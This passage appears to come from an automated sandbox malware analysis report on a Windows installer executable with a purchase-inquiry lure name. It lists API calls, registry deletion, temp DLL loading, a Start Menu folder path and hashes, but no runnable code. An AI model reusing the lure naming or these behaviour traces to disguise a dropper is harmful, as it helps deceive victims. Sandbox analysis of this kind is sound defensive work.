                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                    • API String ID: 1716503409-899883319
                                                                    • Opcode ID: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                                                    • Instruction ID: a4e54dcc62cd1b6bfc855809a1f33464b5edbff741e4ba4f72954512b04b2574
                                                                    • Opcode Fuzzy Hash: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                                                    • Instruction Fuzzy Hash: 58F09076B04204BBEB009F5ADD49ADFB7ACEB91710F10403AF900E7190E2B0AE44CB64
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Close$DeleteEnumOpen
                                                                    • String ID:
                                                                    • API String ID: 1912718029-0
                                                                    • Opcode ID: fdbde4e884f383338cc21de88dd7407a01aefe671536b7f53bbd552f7ed090ed
                                                                    • Instruction ID: 13aa261ecf2a86817b53105e55b29f339a5543dfd3ea7b5a0579e289bf8829aa
                                                                    • Opcode Fuzzy Hash: fdbde4e884f383338cc21de88dd7407a01aefe671536b7f53bbd552f7ed090ed
                                                                    • Instruction Fuzzy Hash: 04116A71908118FFEF119F90DE8CEAE3B79FB14384F100476FA05A11A0D3B49E52AA69
                                                                    APIs
                                                                      • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                      • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                      • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                    • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                    • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                      • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                      • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                      • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106959059885.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.106959018081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106959096492.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106959124482.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                    • String ID:
                                                                    • API String ID: 1791698881-3916222277
                                                                    • Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                                    • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                    • Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                                    • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                      • Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                      • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                      • Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,00403160), ref: 004051D4
                                                                      • Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll), ref: 004051E6
                                                                      • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                      • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                      • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                    • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                    • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                    • String ID: HOy
                                                                    • API String ID: 334405425-3757088568
                                                                    • Opcode ID: 7cbe6cc5643e656bde20360bc899ebf49b1da7b54f9decfdb55d3fb9c057d55e
                                                                    • Instruction ID: c18903b5dbc92386bcc0ded8fd0819d4ecd3504ae344b6f49c713324e9d388be
                                                                    • Opcode Fuzzy Hash: 7cbe6cc5643e656bde20360bc899ebf49b1da7b54f9decfdb55d3fb9c057d55e
                                                                    • Instruction Fuzzy Hash: 8F219831904219EACF20AFA5CE48A9E7E71AF00354F60427BF511B51E1C7BD8E41DA5E
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F11
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F32
                                                                    • RegCloseKey.ADVAPI32(?,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F55
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Call
                                                                    • API String ID: 3677997916-1824292864
                                                                    • Opcode ID: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                                                    • Instruction ID: 1229758a71a34d9b3841ebc19c7c3eba7c9bd897b4c963cc492d8629085b1b1e
                                                                    • Opcode Fuzzy Hash: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                                                    • Instruction Fuzzy Hash: B9011E3255020AEADF21CF55ED09EDB3BA9EF55350F004036F905D6160D335D964DFA5
                                                                    APIs
                                                                    • GlobalFree.KERNEL32(00794F48), ref: 00401BA7
                                                                    • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFree
                                                                    • String ID: Call$HOy
                                                                    • API String ID: 3394109436-3286529560
                                                                    • Opcode ID: 806f3b55fb246c611b27b236904c5f6d79bd38517f7bf01514c27f3d8d10ef11
                                                                    • Instruction ID: 92ea0690437fa8f145506ea4d9625389eaa327d8cc6974590e314eb6964df5ff
                                                                    • Opcode Fuzzy Hash: 806f3b55fb246c611b27b236904c5f6d79bd38517f7bf01514c27f3d8d10ef11
                                                                    • Instruction Fuzzy Hash: 9121A172600100EBDB20EF94CD8499AB3B9EB84328724403BF102F72D1DBBCA8119F6D
                                                                    APIs
                                                                      • Part of subcall function 00405A79: CharNextW.USER32(?,?,00424EF0,?,00405AED,00424EF0,00424EF0,75C43420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75C43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                                                      • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
                                                                      • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4
                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                      • Part of subcall function 00405648: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040568B
                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Intensifies,?,00000000,000000F0), ref: 00401645
                                                                    Strings
                                                                    • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Intensifies, xrefs: 00401638
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                    • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Intensifies
                                                                    • API String ID: 1892508949-516762134
                                                                    • Opcode ID: 4dc858f603fc32a3fc621e98b1f91cefd9875c489ec625af40ed7c1bf8507b13
                                                                    • Instruction ID: c4264af60da0efacfc01d1487171d30b62475a562f2de0234080d29f7ac7759b
                                                                    • Opcode Fuzzy Hash: 4dc858f603fc32a3fc621e98b1f91cefd9875c489ec625af40ed7c1bf8507b13
                                                                    • Instruction Fuzzy Hash: 5611B631504504EBCF206FA5CD4199F3AB1EF54368B240A3BF946B61F1D63E4A81DE5E
                                                                    APIs
                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: `7~v0}
                                                                    • API String ID: 3850602802-2153329232
                                                                    • Opcode ID: b5ca2ebfc38e8c40cc9dd1a42e0f544b2ed62ef4447f49d6c3b0efbc094499f8
                                                                    • Instruction ID: 40f3ddd491d249f73d2fb4fc43cce1b0e50519406e0a546e2fe7b43c981aace9
                                                                    • Opcode Fuzzy Hash: b5ca2ebfc38e8c40cc9dd1a42e0f544b2ed62ef4447f49d6c3b0efbc094499f8
                                                                    • Instruction Fuzzy Hash: 2801D131B24210ABE7295B389D05B2A3698E710314F10863EB911F62F1DA78DC138B4D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                                                    • Instruction ID: 4318c0865f168c3c39c32caca64743d138ecf2e5224254a141b4117f5842e3e1
                                                                    • Opcode Fuzzy Hash: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                                                    • Instruction Fuzzy Hash: 6FA14371E00229CBDF28CFA8C854BADBBB1FF44305F15856AD816BB281C7785A96DF44
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                                                    • Instruction ID: 8bd9da501ed45a7f5d2d0dfc2be718583217048081f6288eced8fd4e99326474
                                                                    • Opcode Fuzzy Hash: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                                                    • Instruction Fuzzy Hash: D3913370D00229CBDF28CFA8C854BADBBB1FF44305F15812AD816BB291C7795A96CF84
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                                                    • Instruction ID: cc0f6ab454a14bc981dfc54755cdbe6dc6b21fe19783e5e5045ac21e9f873034
                                                                    • Opcode Fuzzy Hash: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                                                    • Instruction Fuzzy Hash: 57813271E00229CBDB24CFA8C844BADBBB1FF45305F25816AD816BB291C7789A95CF54
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                                                    • Instruction ID: 36932640a45318c75a18aff77ab64511548531c3f0ac059ca6f487157756e1a6
                                                                    • Opcode Fuzzy Hash: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                                                    • Instruction Fuzzy Hash: DB816831D04229DBDB24CFA8D8447ADBBB0FF44305F15816AE856BB2C0C7785A96CF44
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
